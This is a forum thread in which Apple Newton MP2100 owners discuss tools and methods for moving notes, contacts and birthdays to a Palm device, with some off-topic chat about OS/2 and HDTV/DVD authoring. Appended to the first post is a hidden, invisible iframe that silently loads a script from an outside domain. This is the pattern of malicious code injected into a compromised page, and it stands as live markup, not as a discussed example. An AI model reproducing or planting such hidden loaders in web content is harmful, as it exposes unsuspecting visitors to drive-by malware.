Newton -> Palm questions

I'm a long-time user of a Newton MP2100. I'd held off on getting a Palm for so long because the Newton was so far advanced that I couldn't see myself using a Palm.

However, now that I've got a cell-phone with an integrated Palm, I've started migrating everything over. Anybody know of any utilities to transfer my accumulated information from the Newton to the Palm? The main thing I'm after is the notes, lots of work related info that's handy to have ready access too.

Another issue I have is the Newton automatically inserted birthdays and anniversaries stored in the Names into the calendar. I've set up Custom 1 and 2 to store the dates, but I really miss having them automatically put into the calendar. I don't know how many people I've surprised because I "remembered" their birthday. Any suggestions?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

There were a couple of good FAQs a couple years ago that told the best way to bring things across. I'm not sure where to find them now if they still exist. Try the-gadgeteer.com maybe. I would convert your notes to text & then to the memo pad (that's easy). The addresses would be best as a csv & then imported to the Palm Desktop (Lotus Notes). You can use the freeware Happy Days available on PalmGear to view your birthdays & import them into the datebook if you like. I know it only uses one custom field though. The ToDo's may have to be just entered manually. I suppose you could cut & paste from exported text into ToDo's on the desktop. Other apps like Pocket Monet or whatever will have to be brought across as csv's. Hope that helps.

Palm Desktop has fields for Birthday and Anniversary and filling them in will insert them into your calendar automatically.

Newton to Palm

Another MP2100 user. Fantastic! I still use mine every single day; barely leaves my left hand when I'm at work.

From your sig line, I'll assume you're working on a Mac, not a PC? If so, you should simply be able to export your Names file using Newton Connection Utilities, and then import the resultant file into Palm Desktop. On Macs, Palm Desktop is a deriviative of the old Claris Organizer, which uses the same native fields as the Newton! So it should import pretty easily. I'm not sure, but I'd imagine the PC version could handle the format as well. I've done the move on a Mac (to a Clie NR70, not to an I300) successfully several times.

As for notes... I've never exported those (en masse) so can't help much there, sorry.

Good luck! (And keep the green!

That'll work for the notes, which is my main concern. For the address info I'm debating doing it manually to force myself to clean out old contacts. HappyDays looks like it'll do what I need - thanx for the suggestion!

Neat to know, but from my Newton experience I've gotten into the habit of using my PDA stand alone. I only attached it to the computer for backup and software installation. Probably comes from primarily using OS/2 and not having any integration options available for the Newton.

Same here. You know about the wireless NIC driver for the Newton? It works great. Actually, I've got a PC running eComStation, the latest version of OS/2. I've been an OS/2 user since my first IBM compatible PC in 94. My computers before then were the Amiga, C=128, C=64 and VIC= 20. I've been eyeing(no pun intended) the new iMac with DVD creation abilities. Only thing holding me back is I've already taken the HDTV plunge and want to make anamorphic DVDs using a 16:9 camcorder. Instead of recording a letterboxed image, an anamorphic DVD uses the full resolution for 16:9 displays and the DVD Player downgrades and adds on the letterbox for "normal" TVs. There's a "professional" package that supports anamorphic, but for personal use $1000 is a bit steep.

OT

I happily have a WaveLAN silver card sticking out from the side of my Newton. Been using it since alpha, and yes, it's great. It totally changes the character of the device, in my opinion. (It does have a problem with large transfers via AppleTalk, where it will hang, but TCP/IP operation is flawless.)

Good luck with the HDTV/DVD thing. I've stayed away so far because I perceive a lack of standards about things like what you mention. Oh, and maybe the prices have something to do with it too...

Cheers--
